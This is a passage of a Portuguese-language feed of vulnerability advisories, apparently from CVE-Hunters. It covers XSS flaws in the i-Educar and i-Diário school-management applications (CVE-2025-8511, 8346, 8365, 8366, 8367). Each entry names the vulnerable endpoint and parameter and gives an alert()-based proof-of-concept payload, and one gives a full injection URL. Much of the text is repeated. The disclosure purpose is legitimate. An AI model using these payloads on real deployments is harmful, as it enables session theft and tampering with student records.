<code>"Editar"</code>.</p> <p><img src="/p/cve-2025-8509/image-1.png" width="846" height="354" srcset="/p/cve-2025-8509/image-1_hu_f1e1a80ba93b939e.png 480w, /p/cve-2025-8509/image-1_hu_fe73307a5bce70dc.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="238" data-flex-basis="573px" /></p> <p style="text-align: justify;">Este payload foi enviado através do campo de matrícula e armazenado com sucesso. Ao acessar o conteúdo afetado, o JavaScript é executado imediatamente no contexto do navegador da vítima.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8509.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8509.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 03 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8511/ https://www.cvehunters.com/pt/p/cve-2025-8511/ <h2 id="cve-2025-8511-cross-site-scripting-xss-armazenado-no-endpoint-diario-de-observacoesid-parâmetro-observações--descrição">CVE-2025-8511: Cross-Site Scripting (XSS) Armazenado no endpoint <code>/diario-de-observacoes/[ID]</code> parâmetro <code>Observações > Descrição</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8511" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8511</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>/diario-de-observacoes/[ID]</code> do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Observações > Descrição</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p><h2 id="cve-2025-8511-cross-site-scripting-xss-armazenado-no-endpoint-diario-de-observacoesid-parâmetro-observações--descrição">CVE-2025-8511: Cross-Site Scripting (XSS) Armazenado no endpoint <code>/diario-de-observacoes/[ID]</code> parâmetro <code>Observações > Descrição</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8511" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8511</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>/diario-de-observacoes/[ID]</code> do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Observações > Descrição</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/diario-de-observacoes/[ID]</code></p> <p>Parâmetro: <code>Observações > Descrição</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>Observações > Descrição</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC-XXS2'</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8511/image.png" width="911" height="898" srcset="/p/cve-2025-8511/image_hu_f881a20290b02ea9.png 480w, /p/cve-2025-8511/image_hu_77597c0c3a04f49b.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="101" data-flex-basis="243px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-8511.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-8511.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 03 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8346/ https://www.cvehunters.com/pt/p/cve-2025-8346/ <h2 id="cve-2025-8346-cross-site-scripting-xss-refletido-no-endpoint-educar_aluno_lstphp-via-parâmetro-ref_cod_matricula">CVE-2025-8346: Cross-Site Scripting (XSS) Refletido no endpoint <code>educar_aluno_lst.php</code> via parâmetro <code>ref_cod_matricula</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8346" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8346</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>educar_aluno_lst.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>ref_cod_matricula</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>educar_aluno_lst.php</code></p> <p>Parâmetro: <code>ref_cod_matricula</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>ref_cod_matricula</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p><h2 id="cve-2025-8346-cross-site-scripting-xss-refletido-no-endpoint-educar_aluno_lstphp-via-parâmetro-ref_cod_matricula">CVE-2025-8346: Cross-Site Scripting (XSS) Refletido no endpoint <code>educar_aluno_lst.php</code> via parâmetro <code>ref_cod_matricula</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8346" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8346</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>educar_aluno_lst.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>ref_cod_matricula</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>educar_aluno_lst.php</code></p> <p>Parâmetro: <code>ref_cod_matricula</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>ref_cod_matricula</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">img</span><span class="o">%</span><span class="mi">20</span><span class="nx">src</span><span class="o">=</span><span class="nx">x</span><span class="o">%</span><span class="mi">20</span><span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="o">%</span><span class="mi">27</span><span class="nx">CVE</span><span class="o">-</span><span class="nx">Hunters</span><span class="o">%</span><span class="mi">27</span><span class="p">)</span><span class="o">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8346/image.png" width="2226" height="1408" srcset="/p/cve-2025-8346/image_hu_4ad20b410643cee4.png 480w, /p/cve-2025-8346/image_hu_8466039bf764aed0.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="158" data-flex-basis="379px" /></p> <h3 id="payload-completo">Payload Completo: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> https://localhost/intranet/educar_aluno_lst.php?ref_cod_matricula="><span class="p"><</span><span class="nt">img</span><span class="err">%</span><span class="na">20src</span><span class="o">=</span><span class="s">x%20onerror=alert(%27CVE-Hunters%27)</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8346.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8346.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Thu, 31 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8365/ https://www.cvehunters.com/pt/p/cve-2025-8365/ <h2 id="cve-2025-8365-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-atendidos_cadphp">CVE-2025-8365: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>atendidos_cad.php</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8365" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8365</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>atendidos_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>nome</code>, <code>nome_social</code> e <code>email</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>atendidos_cad.php</code></p><h2 id="cve-2025-8365-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-atendidos_cadphp">CVE-2025-8365: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>atendidos_cad.php</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8365" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8365</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>atendidos_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>nome</code>, <code>nome_social</code> e <code>email</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>atendidos_cad.php</code></p> <p>Parâmetros: <code>nome</code>, <code>nome_social</code> e <code>email</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros <code>nome</code>, <code>nome_social</code> e <code>email</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">img</span> <span class="nx">src</span><span class="o">=</span><span class="nx">x</span> <span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</span><span class="o">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8365/image.png" width="1229" height="332" srcset="/p/cve-2025-8365/image_hu_cfca56083774b524.png 480w, /p/cve-2025-8365/image_hu_3fab16a5d252a9b8.png 1024w" loading="lazy" alt="Parâmetro nome" class="gallery-image" data-flex-grow="370" data-flex-basis="888px" /></p> <p><img src="/p/cve-2025-8365/image-1.png" width="1208" height="350" srcset="/p/cve-2025-8365/image-1_hu_4f88faef3bff0085.png 480w, /p/cve-2025-8365/image-1_hu_a097317291baef5.png 1024w" loading="lazy" alt="Parâmetro nome_social" class="gallery-image" data-flex-grow="345" data-flex-basis="828px" /></p> <p><img src="/p/cve-2025-8365/image-2.png" width="1229" height="342" srcset="/p/cve-2025-8365/image-2_hu_23eddbd5b1dbebb0.png 480w, /p/cve-2025-8365/image-2_hu_7c7b2bc555309126.png 1024w" loading="lazy" alt="Parâmetro email" class="gallery-image" data-flex-grow="359" data-flex-basis="862px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8365.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8365.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Thu, 31 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8366/ https://www.cvehunters.com/pt/p/cve-2025-8366/ <h2 id="cve-2025-8366-múltiplos-cross-site-scripting-xss-refletido-no-endpoint-educar_servidor_lstphp">CVE-2025-8366: Múltiplos Cross-Site Scripting (XSS) Refletido no endpoint <code>educar_servidor_lst.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8366" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8366</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Refletido) foram identificadas no endpoint <code>educar_servidor_lst.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>nome</code> e <code>matricula_sevidor</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>educar_servidor_lst.php</code></p> <p>Parâmetros: <code>nome</code> e <code>matricula_sevidor</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros <code>nome</code> e <code>matricula_sevidor</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p><h2 id="cve-2025-8366-múltiplos-cross-site-scripting-xss-refletido-no-endpoint-educar_servidor_lstphp">CVE-2025-8366: Múltiplos Cross-Site Scripting (XSS) Refletido no endpoint <code>educar_servidor_lst.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8366" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8366</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Refletido) foram identificadas no endpoint <code>educar_servidor_lst.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>nome</code> e <code>matricula_sevidor</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>educar_servidor_lst.php</code></p> <p>Parâmetros: <code>nome</code> e <code>matricula_sevidor</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros <code>nome</code> e <code>matricula_sevidor</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8366/image.png" width="863" height="1056" srcset="/p/cve-2025-8366/image_hu_6199b9aaaa300864.png 480w, /p/cve-2025-8366/image_hu_e3f7025ac01bf0a0.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="81" data-flex-basis="196px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8366.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8366.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Thu, 31 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8367/ https://www.cvehunters.com/pt/p/cve-2025-8367/ <h2 id="cve-2025-8367-cross-site-scripting-xss-refletido-no-endpoint-funcionario_vinculo_lstphp-parâmetro-nome">CVE-2025-8367: Cross-Site Scripting (XSS) Refletido no endpoint <code>funcionario_vinculo_lst.php</code> parâmetro <code>nome</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8367" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8367</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>funcionario_vinculo_lst.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>nome</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>funcionario_vinculo_lst.php</code></p> <p>Parâmetro: <code>nome</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>nome</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p><h2 id="cve-2025-8367-cross-site-scripting-xss-refletido-no-endpoint-funcionario_vinculo_lstphp-parâmetro-nome">CVE-2025-8367: Cross-Site Scripting (XSS) Refletido no endpoint <code>funcionario_vinculo_lst.php</code> parâmetro <code>nome</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8367" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8367</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>funcionario_vinculo_lst.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>nome</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>funcionario_vinculo_lst.php</code></p> <p>Parâmetro: <code>nome</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>nome</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8367/image.png" width="847" height="702" srcset="/p/cve-2025-8367/image_hu_facf55028aaff81d.png 480w, /p/cve-2025-8367/image_hu_e1b6305ab119a43a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="120" data-flex-basis="289px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8367.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8367.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Thu, 31 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8368/ https://www.cvehunters.com/pt/p/cve-2025-8368/ <h2 id="cve-2025-8368-múltiplos-cross-site-scripting-xss-refletido-no-endpoint-pesquisa_pessoa_lstphp">CVE-2025-8368: Múltiplos Cross-Site Scripting (XSS) Refletido no endpoint <code>pesquisa_pessoa_lst.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a 